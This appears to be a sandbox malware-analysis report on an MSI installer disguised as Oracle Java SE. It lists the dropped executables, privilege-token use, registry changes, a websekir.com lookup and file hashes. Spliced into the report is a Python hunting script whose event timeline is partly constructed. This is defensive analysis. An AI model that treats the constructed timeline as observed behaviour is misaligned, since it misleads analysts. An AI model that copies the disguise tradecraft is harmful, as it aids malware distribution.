Analysis Overview
SHA256
f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
Threat Level: Likely malicious
The file 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Modifies file permissions
Enumerates connected drives
Blocklisted process makes network request
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
Loads dropped DLL
System Location Discovery: System Language Discovery
Event Triggered Execution: Installer Packages
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-16 08:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-16 08:21
Reported
2024-10-16 08:24
Platform
win7-20240729-en
Max time kernel
142s
Max time network
62s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\f77c948.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c948.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f77c949.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICD4D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f77c94b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f77c949.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC41.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC51.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F846D7892EC1A7F3C05386819156FEF4
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7B7C43405B7DE54D4C7E4575FA51208 M Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"
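The chain worth pivoting on in this process list is msiexec.exe writing executables into a new Program Files directory and the `-Embedding` custom-action server launching them during the same install, alongside msiexec.exe itself making network requests. The Python below is an added example (not part of the sandbox output) that expresses that hunt as logic over a constructed event timeline: the image paths are taken from this report, while the timestamps, parent links and event ordering are assumed for illustration.

```python
"""Hunt logic for the msiexec behaviour in this report.

Added example, not part of the sandbox output. Runs over a constructed
timeline modelled on the signature tables above (paths from the report;
timestamps and parent/child links are assumed) and flags:
  * an executable written by msiexec outside C:\Windows\Installer that
    is launched before the install finishes, and
  * msiexec itself making an outbound connection.
"""
from dataclasses import dataclass


@dataclass
class Event:
    t: int              # seconds since detonation start (constructed)
    kind: str           # "file_create" | "proc_create" | "net_connect"
    image: str          # process performing the action
    target: str = ""    # file path, child image, or destination host:port


MSIEXEC = {"c:\\windows\\system32\\msiexec.exe", "c:\\windows\\syswow64\\msiexec.exe"}
INSTALLER_CACHE = "c:\\windows\\installer\\"   # msiexec's own cache; writes here are expected
BASE = r"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE"

# Constructed timeline modelled on the report's tables.
EVENTS = [
    Event(0, "proc_create", r"C:\Windows\explorer.exe", r"C:\Windows\system32\msiexec.exe"),
    Event(5, "file_create", r"C:\Windows\system32\msiexec.exe", r"C:\Windows\Installer\f77c948.msi"),
    Event(9, "net_connect", r"C:\Windows\system32\msiexec.exe", "repository.certum.pl:80"),
    Event(12, "file_create", r"C:\Windows\system32\msiexec.exe", BASE + r"\patch_service.exe"),
    Event(13, "file_create", r"C:\Windows\system32\msiexec.exe", BASE + r"\Register.exe"),
    Event(14, "file_create", r"C:\Windows\system32\msiexec.exe", BASE + r"\libcurl.dll"),
    Event(20, "proc_create", r"C:\Windows\syswow64\MsiExec.exe", BASE + r"\patch_service.exe"),
    Event(21, "proc_create", r"C:\Windows\syswow64\MsiExec.exe", BASE + r"\Register.exe"),
]


def _is_msiexec(image: str) -> bool:
    return image.lower() in MSIEXEC


def dropped_exes(events) -> dict:
    """Executables written by msiexec outside its cache dir -> time written."""
    return {e.target.lower(): e.t for e in events
            if e.kind == "file_create" and _is_msiexec(e.image)
            and e.target.lower().endswith(".exe")
            and not e.target.lower().startswith(INSTALLER_CACHE)}


def executed_dropped(events) -> list:
    """(path, parent image) for dropped executables launched after being written."""
    dropped = dropped_exes(events)
    return [(e.target, e.image) for e in events
            if e.kind == "proc_create" and e.target.lower() in dropped
            and e.t >= dropped[e.target.lower()]]


def msiexec_network(events) -> list:
    """Destinations contacted directly by msiexec."""
    return [e.target for e in events if e.kind == "net_connect" and _is_msiexec(e.image)]


def findings(events) -> list:
    out = [f"dropped EXE executed: {path} (parent {parent})"
           for path, parent in executed_dropped(events)]
    out += [f"msiexec network request: {dst}" for dst in msiexec_network(events)]
    return out


if __name__ == "__main__":
    for line in findings(EVENTS):
        print(line)
```

Treat the network finding as a pivot rather than a verdict: Windows Installer legitimately fetches certificate chain and revocation data while checking Authenticode signatures, and the `CryptnetUrlCache` entries in the Files section together with the `repository.certum.pl` lookups are consistent with that. The dropped-EXE-executed finding is the stronger signal here because the binaries run from a directory the installer itself just created.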
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.18.63.21:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:49425 | N/A | tcp |
| N/A | 127.0.0.1:49428 | N/A | tcp |
| N/A | 127.0.0.1:49431 | N/A | tcp |
| N/A | 127.0.0.1:49434 | N/A | tcp |
| N/A | 127.0.0.1:49437 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabC812.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarC824.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8db417db00fe3cf55e2a3bfd7706c920 |
| SHA1 | fbfae63b218940b237ee915cc406bc98ad33bdab |
| SHA256 | e815c0884eeda37b3ef35d1783284c70ed02673dba3956eb8a007caaae9e8f65 |
